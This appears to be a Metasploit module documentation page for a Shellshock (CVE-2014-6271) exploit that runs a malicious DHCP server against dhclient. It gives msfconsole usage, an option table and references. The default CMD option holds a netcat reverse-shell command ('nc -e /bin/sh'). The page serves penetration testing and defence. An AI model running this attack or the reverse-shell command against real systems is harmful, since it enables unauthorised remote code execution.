DHCP Client Bash Environment Variable Code Injection (Shellshock) - Metasploit
This page contains detailed information about how to use the auxiliary/server/dhclient_bash_env metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.
Module Overview
Name: DHCP Client Bash Environment Variable Code Injection (Shellshock)
Module: auxiliary/server/dhclient_bash_env
Source code: modules/auxiliary/server/dhclient_bash_env.rb
Disclosure date: 2014-09-24
Last modification time: 2021-01-28 10:35:25 +0000
Supported architecture(s): -
Supported platform(s): -
Target service / protocol: -
Target network port(s): -
List of CVEs: CVE-2014-6271
This module is also known as Shellshock.
This module exploits the Shellshock vulnerability, a flaw in how the Bash shell handles external environment variables. This module targets dhclient by responding to DHCP requests with a malicious hostname, domainname, and URL which are then passed to the configuration scripts as environment variables, resulting in code execution.
Module Ranking and Traits
Module Ranking:
- normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.
Basic Usage
msf > use auxiliary/server/dhclient_bash_env
msf auxiliary(dhclient_bash_env) > show targets
... a list of targets ...
msf auxiliary(dhclient_bash_env) > set TARGET target-id
msf auxiliary(dhclient_bash_env) > show options
... show and set options ...
msf auxiliary(dhclient_bash_env) > exploit
Required Options
SRVHOST: The IP of the DHCP server
NETMASK: The netmask of the local subnet
Go back to menu.
Msfconsole Usage
Here is how the server/dhclient_bash_env auxiliary module looks in the msfconsole:
msf6 > use auxiliary/server/dhclient_bash_env
msf6 auxiliary(server/dhclient_bash_env) > show info
Name: DHCP Client Bash Environment Variable Code Injection (Shellshock)
Module: auxiliary/server/dhclient_bash_env
License: Metasploit Framework License (BSD)
Rank: Normal
Disclosed: 2014-09-24
Provided by:
scriptjunkie
apconole <[email protected]>
Stephane Chazelas
Ramon de C Valle <[email protected]>
Available actions:
Name Description
---- -----------
Service Run malicious DHCP server
Check supported:
No
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
BROADCAST no The broadcast address to send to
CMD /bin/nc -e /bin/sh 127.0.0.1 4444 yes The command to run
DHCPIPEND no The last IP to give out
DHCPIPSTART no The first IP to give out
DNSSERVER no The DNS server IP address
FILENAME no The optional filename of a tftp boot server
HOSTSTART no The optional host integer counter
NETMASK yes The netmask of the local subnet
ROUTER no The router IP address
SRVHOST yes The IP of the DHCP server
Description:
This module exploits the Shellshock vulnerability, a flaw in how the
Bash shell handles external environment variables. This module
targets dhclient by responding to DHCP requests with a malicious
hostname, domainname, and URL which are then passed to the
configuration scripts as environment variables, resulting in code
execution.
References:
https://nvd.nist.gov/vuln/detail/CVE-2014-6271
https://cwe.mitre.org/data/definitions/94.html
OSVDB (112004)
https://www.exploit-db.com/exploits/34765
https://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/
https://seclists.org/oss-sec/2014/q3/649
https://www.trustedsec.com/september-2014/shellshock-dhcp-rce-proof-concept/
Also known as:
Shellshock
Module Options
This is a complete list of options available in the server/dhclient_bash_env auxiliary module:
msf6 auxiliary(server/dhclient_bash_env) > show options
Module options (auxiliary/server/dhclient_bash_env):
Name Current Setting Required Description
---- --------------- -------- -----------
BROADCAST no The broadcast address to send to
CMD /bin/nc -e /bin/sh 127.0.0.1 4444 yes The command to run
DHCPIPEND no The last IP to give out
DHCPIPSTART no The first IP to give out
DNSSERVER no The DNS server IP address
FILENAME no The optional filename of a tftp boot server
HOSTSTART no The optional host integer counter
NETMASK yes The netmask of the local subnet
ROUTER no The router IP address
SRVHOST yes The IP of the DHCP server
Auxiliary action:
Name Description
---- -----------
Service Run malicious DHCP server
Advanced Options
Here is a complete list of advanced options supported by the server/dhclient_bash_env auxiliary module:
msf6 auxiliary(server/dhclient_bash_env) > show advanced
Module advanced options (auxiliary/server/dhclient_bash_env):
Name Current Setting Required Description
---- --------------- -------- -----------
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
Auxiliary Actions
This is a list of all auxiliary actions that the server/dhclient_bash_env module can do:
msf6 auxiliary(server/dhclient_bash_env) > show actions
Auxiliary actions:
Name Description
---- -----------
Service Run malicious DHCP server
Evasion Options
Here is the full list of possible evasion options supported by the server/dhclient_bash_env auxiliary module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):
msf6 auxiliary(server/dhclient_bash_env) > show evasion
Module evasion options:
Name Current Setting Required Description
---- --------------- -------- -----------
Go back to menu.
Related Pull Requests
- #14696 Merged Pull Request: Zeitwerk rex folder
- #13443 Merged Pull Request: Add descriptions to auxiliary modules Actions
- #10649 Merged Pull Request: Fix http://seclists.org links to https://
- #10570 Merged Pull Request: AKA Metadata Refactor
- #8716 Merged Pull Request: Print_Status -> Print_Good (And OCD bits 'n bobs)
- #8629 Merged Pull Request: add 'Also known as', AKA 'AKA', to module references
- #8338 Merged Pull Request: Fix msf/core and self.class msftidy warnings
- #6812 Merged Pull Request: Resolve #6807, remove all OSVDB references.
- #6655 Merged Pull Request: use MetasploitModule as a class name
- #6648 Merged Pull Request: Change metasploit class names
- #6298 Merged Pull Request: Update Shellshock modules, add Advantech coverage
- #3912 Merged Pull Request: Fix bad header error from pure Bash CGI script
- #3891 Merged Pull Request: Add dhclient_bash_env.rb (Bash exploit)
References
- CVE-2014-6271
- CWE-94
- OSVDB (112004)
- EDB-34765
- https://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/
- https://seclists.org/oss-sec/2014/q3/649
- https://www.trustedsec.com/september-2014/shellshock-dhcp-rce-proof-concept/
See Also
Check also the following modules related to this module:
- exploit/linux/http/advantech_switch_bash_env_exec
- auxiliary/scanner/http/apache_mod_cgi_bash_env
- exploit/multi/http/apache_mod_cgi_bash_env_exec
- exploit/unix/dhcp/bash_environment
- exploit/multi/http/cups_bash_env_exec
- exploit/linux/http/ipfire_bashbug_exec
- exploit/multi/ftp/pureftpd_bash_env_exec
- exploit/unix/smtp/qmail_bash_env_exec
- exploit/osx/local/vmware_bash_function_root
- auxiliary/scanner/printer/printer_env_vars
- post/multi/gather/env
- post/windows/gather/enum_powershell_env
- auxiliary/gather/alienvault_iso27001_sqli
- auxiliary/gather/alienvault_newpolicyform_sqli
- auxiliary/scanner/openvas/openvas_gsad_login
- auxiliary/scanner/openvas/openvas_omp_login
- auxiliary/scanner/openvas/openvas_otp_login
- auxiliary/scanner/sap/sap_mgmt_con_getenv
- encoder/x86/fnstenv_mov
- exploit/linux/http/alienvault_exec
- exploit/linux/http/alienvault_sqli_exec
- exploit/linux/ids/alienvault_centerd_soap_exec
- exploit/multi/misc/openview_omniback_exec
- exploit/unix/webapp/openview_connectednodes_exec
- exploit/windows/http/hp_nnm_openview5
- exploit/windows/http/hp_openview_insight_backdoor
- post/linux/gather/openvpn_credentials
- exploit/linux/local/bash_profile_persistence
- payload/cmd/unix/reverse_bash
- payload/cmd/unix/reverse_bash_telnet_ssl
- payload/cmd/unix/reverse_bash_udp
Related Nessus plugins:
- Solaris 10 (x86) : 126547-10 (deprecated)
- Solaris 10 (sparc) : 126546-10 (deprecated)
- Bash Remote Code Execution (Shellshock)
- Debian DSA-3032-1 : bash - security update
- RHEL 5 / 6 / 7 : bash (RHSA-2014:1293) (Shellshock)
- GNU Bash Environment Variable Handling Code Injection (Shellshock)
- Slackware 13.0 / 13.1 / 13.37 / 14.0 / 14.1 / current : bash (SSA:2014-267-01) (Shellshock)
- CentOS 5 / 6 / 7 : bash (CESA-2014:1293) (Shellshock)
- FreeBSD : bash -- remote code execution vulnerability (71ad81da-4414-11e4-a33e-3c970e169bc2) (Shellshock)
- Mandriva Linux Security Advisory : bash (MDVSA-2014:186)
Authors
- scriptjunkie
- apconole[at]yahoo.com
- Stephane Chazelas
- Ramon de C Valle
Version
This page has been produced using Metasploit Framework version 6.1.29-dev. For more modules, visit the Metasploit Module Library.
Go back to menu.